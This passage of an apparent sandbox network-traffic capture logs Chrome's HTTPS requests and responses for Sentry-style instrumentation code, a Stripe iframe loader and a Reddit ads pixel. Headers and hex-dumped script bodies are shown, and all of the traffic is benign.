                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC1379INData Raw: 70 72 6f 74 6f 63 6f 6c 3a 65 2c 70 75 62 6c 69 63 4b 65 79 3a 72 7d 29 7d 28 74 29 3a 45 28 74 29 7d 63 6f 6e 73 74 20 53 3d 5b 22 64 65 62 75 67 22 2c 22 69 6e 66 6f 22 2c 22 77 61 72 6e 22 2c 22 65 72 72 6f 72 22 2c 22 6c 6f 67 22 2c 22 61 73 73 65 72 74 22 2c 22 74 72 61 63 65 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 78 28 74 2c 6e 3d 30 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 30 3d 3d 3d 6e 7c 7c 74 2e 6c 65 6e 67 74 68 3c 3d 6e 3f 74 3a 60 24 7b 74 2e 73 75 62 73 74 72 28 30 2c 6e 29 7d 2e 2e 2e 60 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 74 2c 6e 29 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72 6e 22 22 3b 63 6f 6e 73 74 20 65 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 6e 3d 30 3b 6e 3c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: protocol:e,publicKey:r})}(t):E(t)}const S=["debug","info","warn","error","log","assert","trace"];function x(t,n=0){return"string"!=typeof t||0===n||t.length<=n?t:`${t.substr(0,n)}...`}function j(t,n){if(!Array.isArray(t))return"";const e=[];for(let n=0;n<
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC1379INData Raw: 74 2e 6b 65 79 73 28 49 28 74 29 29 3b 69 66 28 65 2e 73 6f 72 74 28 29 2c 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 68 61 73 20 6e 6f 20 6b 65 79 73 5d 22 3b 69 66 28 65 5b 30 5d 2e 6c 65 6e 67 74 68 3e 3d 6e 29 72 65 74 75 72 6e 20 78 28 65 5b 30 5d 2c 6e 29 3b 66 6f 72 28 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 68 3b 74 3e 30 3b 74 2d 2d 29 7b 63 6f 6e 73 74 20 72 3d 65 2e 73 6c 69 63 65 28 30 2c 74 29 2e 6a 6f 69 6e 28 22 2c 20 22 29 3b 69 66 28 21 28 72 2e 6c 65 6e 67 74 68 3e 6e 29 29 72 65 74 75 72 6e 20 74 3d 3d 3d 65 2e 6c 65 6e 67 74 68 3f 72 3a 78 28 72 2c 6e 29 7d 72 65 74 75 72 6e 22 22 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 29 7b 72 65 74 75 72 6e 20 4c 28 74 2c 6e 65 77 20 4d 61 70 29 7d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: t.keys(I(t));if(e.sort(),!e.length)return"[object has no keys]";if(e[0].length>=n)return x(e[0],n);for(let t=e.length;t>0;t--){const r=e.slice(0,t).join(", ");if(!(r.length>n))return t===e.length?r:x(r,n)}return""}function A(t){return L(t,new Map)}functio
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC1379INData Raw: 61 64 65 72 73 2c 6e 65 77 20 52 65 71 75 65 73 74 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 29 2c 6e 65 77 20 52 65 73 70 6f 6e 73 65 2c 21 30 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 42 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 2f 5e 66 75 6e 63 74 69 6f 6e 20 66 65 74 63 68 5c 28 5c 29 5c 73 2b 5c 7b 5c 73 2b 5c 5b 6e 61 74 69 76 65 20 63 6f 64 65 5c 5d 5c 73 2b 5c 7d 24 2f 2e 74 65 73 74 28 74 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 63 6f 6e 73 74 20 58 3d 70 28 29 2c 7a 3d 7b 7d 2c 57 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 4a 28 74 29 7b 69 66 28 21 57 5b 74 5d 29 73 77 69 74 63 68 28 57 5b 74 5d 3d 21 30 2c 74 29 7b 63 61 73 65 22 63 6f 6e 73 6f 6c 65 22 3a 21 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: aders,new Request("http://www.example.com"),new Response,!0}catch(t){return!1}}function B(t){return t&&/^function fetch\(\)\s+\{\s+\[native code\]\s+\}$/.test(t.toString())}const X=p(),z={},W={};function J(t){if(!W[t])switch(W[t]=!0,t){case"console":!func
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC1379INData Raw: 6e 74 61 74 69 6f 6e 5f 68 61 6e 64 6c 65 72 73 5f 5f 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 2c 65 2c 72 29 7d 7d 29 29 29 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 78 68 72 22 3a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 28 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 69 6e 20 58 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 74 3d 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2e 70 72 6f 74 6f 74 79 70 65 3b 4f 28 74 2c 22 6f 70 65 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 2e 2e 2e 6e 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2c 72 3d 6e 5b 31 5d 2c 69 3d 65 2e 5f 5f 73 65 6e 74 72 79 5f 78 68 72 5f 5f 3d 7b 6d 65 74 68 6f 64 3a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ntation_handlers__)}catch(t){}return t.call(this,n,e,r)}})))}))}();break;case"xhr":!function(){if(!("XMLHttpRequest"in X))return;const t=XMLHttpRequest.prototype;O(t,"open",(function(t){return function(...n){const e=this,r=n[1],i=e.__sentry_xhr__={method:
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC1379INData Raw: 51 28 6e 29 7d 2c 73 74 61 72 74 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 3b 72 65 74 75 72 6e 20 47 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 7d 29 2c 74 2e 61 70 70 6c 79 28 58 2c 6e 29 2e 74 68 65 6e 28 28 74 3d 3e 28 47 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 2c 65 6e 64 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 72 65 73 70 6f 6e 73 65 3a 74 7d 29 2c 74 29 29 2c 28 74 3d 3e 7b 74 68 72 6f 77 20 47 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 2c 65 6e 64 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 65 72 72 6f 72 3a 74 7d 29 2c 74 7d 29 29 7d 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 68 69 73 74 6f 72 79 22 3a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Q(n)},startTimestamp:Date.now()};return G("fetch",{...e}),t.apply(X,n).then((t=>(G("fetch",{...e,endTimestamp:Date.now(),response:t}),t)),(t=>{throw G("fetch",{...e,endTimestamp:Date.now(),error:t}),t}))}}))}();break;case"history":!function(){if(!function
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC1379INData Raw: 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 5b 30 5d 3f 74 5b 30 5d 3a 22 52 65 71 75 65 73 74 22 69 6e 20 58 26 26 68 28 74 5b 30 5d 2c 52 65 71 75 65 73 74 29 3f 74 5b 30 5d 2e 75 72 6c 3a 53 74 72 69 6e 67 28 74 5b 30 5d 29 7d 6c 65 74 20 59 3b 6c 65 74 20 5a 2c 74 74 3b 66 75 6e 63 74 69 6f 6e 20 6e 74 28 74 2c 6e 3d 21 31 29 7b 72 65 74 75 72 6e 20 65 3d 3e 7b 69 66 28 21 65 7c 7c 74 74 3d 3d 3d 65 29 72 65 74 75 72 6e 3b 69 66 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 6b 65 79 70 72 65 73 73 22 21 3d 3d 74 2e 74 79 70 65 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 63 6f 6e 73 74 20 6e 3d 74 2e 74 61 72 67 65 74 3b 69 66 28 21 6e 7c 7c 21 6e 2e 74 61 67 4e 61 6d 65 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 49 4e 50 55 54 22 3d 3d 3d 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: string"==typeof t[0]?t[0]:"Request"in X&&h(t[0],Request)?t[0].url:String(t[0])}let Y;let Z,tt;function nt(t,n=!1){return e=>{if(!e||tt===e)return;if(function(t){if("keypress"!==t.type)return!1;try{const n=t.target;if(!n||!n.tagName)return!0;if("INPUT"===n
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC1379INData Raw: 63 68 61 6e 69 73 6d 3b 69 66 28 65 2e 6d 65 63 68 61 6e 69 73 6d 3d 7b 74 79 70 65 3a 22 67 65 6e 65 72 69 63 22 2c 68 61 6e 64 6c 65 64 3a 21 30 2c 2e 2e 2e 72 2c 2e 2e 2e 6e 7d 2c 6e 26 26 22 64 61 74 61 22 69 6e 20 6e 29 7b 63 6f 6e 73 74 20 74 3d 7b 2e 2e 2e 72 26 26 72 2e 64 61 74 61 2c 2e 2e 2e 6e 2e 64 61 74 61 7d 3b 65 2e 6d 65 63 68 61 6e 69 73 6d 2e 64 61 74 61 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 74 28 74 29 7b 69 66 28 74 26 26 74 2e 5f 5f 73 65 6e 74 72 79 5f 63 61 70 74 75 72 65 64 5f 5f 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 54 28 74 2c 22 5f 5f 73 65 6e 74 72 79 5f 63 61 70 74 75 72 65 64 5f 5f 22 2c 21 30 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 74 28 74 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: chanism;if(e.mechanism={type:"generic",handled:!0,...r,...n},n&&"data"in n){const t={...r&&r.data,...n.data};e.mechanism.data=t}}function at(t){if(t&&t.__sentry_captured__)return!0;try{T(t,"__sentry_captured__",!0)}catch(t){}return!1}function ft(t){return
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC1379INData Raw: 70 65 6f 66 20 6e 26 26 6e 21 3d 6e 3f 22 5b 4e 61 4e 5d 22 3a 76 6f 69 64 20 30 3d 3d 3d 6e 3f 22 5b 75 6e 64 65 66 69 6e 65 64 5d 22 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 60 5b 46 75 6e 63 74 69 6f 6e 3a 20 24 7b 50 28 6e 29 7d 5d 60 3a 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 60 5b 24 7b 53 74 72 69 6e 67 28 6e 29 7d 5d 60 3a 22 62 69 67 69 6e 74 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 60 5b 42 69 67 49 6e 74 3a 20 24 7b 53 74 72 69 6e 67 28 6e 29 7d 5d 60 3a 60 5b 6f 62 6a 65 63 74 20 24 7b 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 6e 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 7d 5d 60 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 60 2a 2a 6e 6f 6e 2d 73 65 72 69 61 6c 69 7a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: peof n&&n!=n?"[NaN]":void 0===n?"[undefined]":"function"==typeof n?`[Function: ${P(n)}]`:"symbol"==typeof n?`[${String(n)}]`:"bigint"==typeof n?`[BigInt: ${String(n)}]`:`[object ${Object.getPrototypeOf(n).constructor.name}]`}catch(t){return`**non-serializ


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        77192.168.2.1649814216.137.52.914436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC622OUTGET /v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: js.stripe.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC727INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 526
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 22 Nov 2024 21:05:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Server: Cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:37:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "d96c709017743c0759cf3853d1806ba5"
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 e0bdf334d52930321c517cf8d37af32e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        Age: 1337
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: MRS52-P2
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: Iwb6_7FnZuYpS-I0COq9U-GMtIRPs7PSFUHx0jglhFDaxhpWWl2gFg==
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC526INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 73 74 72 69 70 65 2e 6e 65 74 77 6f 72 6b 22 2c 6e 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2c 74 3d 2f 70 72 65 76 69 65 77 3d 74 72 75 65 2f 2e 74 65 73 74 28 6e 29 3f 22 69 6e 6e 65 72 2d 70 72 65 76 69 65 77 2e 68 74 6d 6c 22 3a 22 69 6e 6e 65 72 2e 68 74 6d 6c 22 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 6f 2e 73 72 63 3d 22 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 29 2e 63 6f 6e 63 61 74 28 6e 29 3b 76 61 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 6e 2e 6f 72 69 67 69 6e 3d 3d 3d 65 29 7b 76 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !function(){"use strict";var e="https://m.stripe.network",n=window.location.hash,t=/preview=true/.test(n)?"inner-preview.html":"inner.html",o=document.createElement("iframe");o.src="".concat(e,"/").concat(t).concat(n);var i=function(n){if(n.origin===e){va


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        78192.168.2.1649815151.101.193.1404436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC606OUTGET /ads/conversions-config/v1/pixel/config/t2_9t33vcn2_telemetry HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.redditstatic.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC868INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 86
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                        cache-control: max-age=300
                                                                                                                                                                                                                                                                                                                                                                                        content-type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: snooserv
                                                                                                                                                                                                                                                                                                                                                                                        Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                                                                                                                                                                                                                        NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.02, "failure_fraction": 0.02}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC86INData Raw: 7b 22 76 65 72 73 69 6f 6e 5f 68 61 73 68 22 3a 22 34 39 32 36 37 62 63 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 64 64 69 74 73 74 61 74 69 63 2e 63 6f 6d 2f 61 64 73 2f 34 39 32 36 37 62 63 65 2f 70 69 78 65 6c 2e 6a 73 22 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"version_hash":"49267bce","url":"https://www.redditstatic.com/ads/49267bce/pixel.js"}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        79192.168.2.1649817151.101.1.1404436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC356OUTGET /ads/pixel.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.redditstatic.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 12220
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 18 Nov 2024 21:16:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "1a001f3a066bff47a766099b87253911"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=60
                                                                                                                                                                                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: snooserv
                                                                                                                                                                                                                                                                                                                                                                                        Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                                                                                                                                                                                                                        NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.02, "failure_fraction": 0.02}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1378INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d4 3b 6b 73 da c8 96 7f 05 ab 6e b8 92 69 cb 80 b1 93 08 6b 5c 04 e4 98 89 8d bd 3c 9c 4c b9 18 4a 96 1a 50 22 24 46 12 71 bc 86 fd ed 7b fa 25 b5 04 b6 93 3b 3b 1f 36 95 42 dd 7d 4e 9f 77 9f 3e dd 92 f7 a6 ab c0 49 bc 30 28 45 2a 46 01 4a b4 a7 74 24 54 3d 34 d5 9e bc a9 ba 17 dc 79 63 d6 c2 b4 f5 dd 8e 4a 8e a9 08 54 c5 34 93 c7 25 0e a7 a5 08 ff b5 f2 22 5c 2e f3 46 93 cc 99 96 cb 8e 16 e1 64 15 05 25 07 88 ee 55 35 32 be 12 63 2b 3e 46 a8 da 66 80 1f 4a 56 14 85 91 aa b4 ed 20 08 93 d2 d4 0b dc d2 22 74 57 3e 2e fd 5b a9 78 15 e5 df 8a d6 4c e6 51 f8 50 b2 75 27 74 b1 a9 5c 5d 77 46 97 d6 a4 77 3d 9c 9c 5f 8f 7a 1d 05 d9 1b 42 6f 69 12 d9 cd 27 fc 63 19 46 49 6c 3c 6d 36 4d a2 c3 5d 75 ac 3b b6 ef ab 4b 9d 83 90 d0 46 8d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ;ksnik\<LJP"$Fq{%;;6B}Nw>I0(E*FJt$T=4ycJT4%"\.Fd%U52c+>FfJV "tW>.[xLQPu't\]wFw=_zBoi'cFIl<m6M]u;KF
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1378INData Raw: 35 f4 02 55 21 55 c8 12 ba 52 28 00 06 cc cb 94 67 fd 4b 16 4d ac c3 63 0b 15 bc 28 63 12 5f d6 b5 4c bb 23 58 a4 94 11 f1 20 a7 02 9b 27 d8 1f ce 82 75 0d 81 8c 74 ed 7a 6f de ed 37 5e f5 af cc e9 b0 4e 72 fd 25 54 64 41 8d bb 96 77 fe 31 ef fa 94 fe df 77 b0 44 87 39 8f 39 4c 9f 46 e1 82 8c b6 61 1b a0 6e cf fc 27 4f 79 d6 85 0c 29 e7 c5 74 88 3b 32 ed 3f e3 cb 02 3e 55 4a 56 65 6d aa a0 41 39 23 e3 70 79 5b 89 ea 69 c2 97 a0 e8 ab be 2c 70 22 ce 1c 25 d3 77 dc 95 b4 f9 8a 23 a5 d2 de c5 64 eb 1c f5 bb ed 70 b1 84 4c 04 c1 86 63 c7 5e 62 95 c5 84 b4 9b 66 04 b4 b4 dc 07 5a c5 52 ff ca f6 c1 86 0b a8 e6 47 c3 f3 83 77 25 d7 4e 6c 85 08 59 b0 f9 0a 04 a5 16 e7 92 70 7e 14 4b 5d 05 5c 0a b6 b5 e7 e4 13 13 35 42 f4 c3 6a 3a c5 11 76 3f f8 a1 f3 ad e5 cf c2
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 5U!UR(gKMc(c_L#X 'utzo7^Nr%TdAw1wD99LFan'Oy)t;2?>UJVemA9#py[i,p"%w#dpLc^bfZRGw%NlYp~K]\5Bj:v?
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1378INData Raw: 3e a6 01 51 71 68 ef 68 4c e3 a2 e2 d2 5e 63 4c c3 a3 82 69 ef 78 4c a3 a4 32 a5 bd 93 31 0d 96 ca 8c f6 de 8e 69 cc 54 e6 eb 2a 0d d7 f3 ad 7a 88 65 bb 9f 3a d5 04 64 09 0e c3 c4 f6 cd 77 fb c5 63 15 83 5e e2 69 02 c0 5c 81 2d 6a 81 94 e6 5d 8a 0a 46 3d 86 93 7d ad fe 8e 9e df d3 f1 37 47 f5 4c 84 bb 5a a3 a2 a6 a0 ca 49 03 66 bd 3f 3d 6d 68 63 96 19 a7 7e 08 8b 2c 13 ee 30 4b 5e 9a 4c e5 f8 39 2a d9 d4 fc c9 c0 6c ec 67 27 09 7e 6b b1 ab cc 64 ab fa c5 43 00 cf 3b af 1c 03 68 d2 91 f2 44 fe 18 00 55 56 bb 90 c7 72 a5 a6 ca 60 a4 2c 23 f5 e0 6e cc b4 50 14 d8 bc 60 43 69 9d c0 c6 ff 3f 96 09 c7 3f 51 26 28 ab 18 97 c8 c5 02 68 46 f7 0a cf 45 ed eb de 60 d8 ea 0d 07 66 4e 76 fa 12 2c 89 15 72 e1 49 2c 26 43 d9 08 80 c8 1b 64 18 c6 71 42 77 8b 2f 57 97 17
